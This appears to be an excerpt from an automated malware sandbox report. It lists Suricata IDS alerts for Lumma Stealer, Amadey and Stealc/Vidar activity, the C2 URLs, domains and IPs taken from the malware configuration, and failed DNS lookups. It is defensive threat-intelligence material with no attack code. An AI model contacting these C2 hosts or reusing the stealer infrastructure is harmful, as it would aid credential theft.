Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:61029 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:57023 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:63919 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:61286 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49932 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:64295 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49976 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49994 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:62039 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:62039 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:65489 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:65489 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:64519 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:64519 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:53232 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:53232 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58458 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58458 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.4:62999 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.4:56333 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.4:56333 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.4:62999 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:58663 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:58663 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50018 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50019 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:50026 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:50460 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:57508 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:49865 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:50033 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:64995 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:52538 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:54318 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50041
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50044 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50071 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:50094 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50084 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:62870 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:60417 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:58197 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:51137 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:55462 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:50641 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:50077 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50264 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.4:58162 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:50283 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:50284 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:58616 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50286 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:59367 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:64149 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:54758 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:51277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:64162 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:54998 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:51171 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50277
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:58933 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50303 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:58769 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:62393 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:55200 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50316 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50296 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50295 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:50318 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:49699 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:50299 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:53059 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:58282 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:54050 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:50685 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:50297 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:61944 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:50320 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50324 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:52440 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50279 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50285 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50281 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50290 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:62332 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49862 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49787 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49842 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49842 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49848 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49848 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49794 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49794 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49787 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49880 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49880 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49812 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49854 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49854 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50018 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50033 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50033 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50017 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49907 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50018 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50026 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50026 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:50050 -> 116.203.12.241:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49923 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50002 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49800 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49800 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.241:443 -> 192.168.2.4:50050
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50002 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49896 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49896 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50094 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50094 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50077 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50077 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50284 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50284 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50320 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50320 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50295 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50295 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50316 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50316 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50322 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50283 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.241:443 -> 192.168.2.4:50056
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50297 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50283 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50065 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50297 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50279 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50279 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50318 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50318 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50288 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50299 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50299 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50302 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50113 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: tacitglibbr.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	IPs: 185.215.113.43

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz
Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impend-differ.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: formy-spill.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zinc-sneark.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: se-blurry.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: effecterectz.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wrathful-jammy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dwell-exclaim.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: print-vexer.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dare-curbys.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: debonairnukk.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: diffuculttan.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sordid-snaked.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: covery-mover.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: awake-weaves.cyou replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 43

Source: global traffic

TCP traffic: 192.168.2.4:49824 -> 87.120.127.228:7777

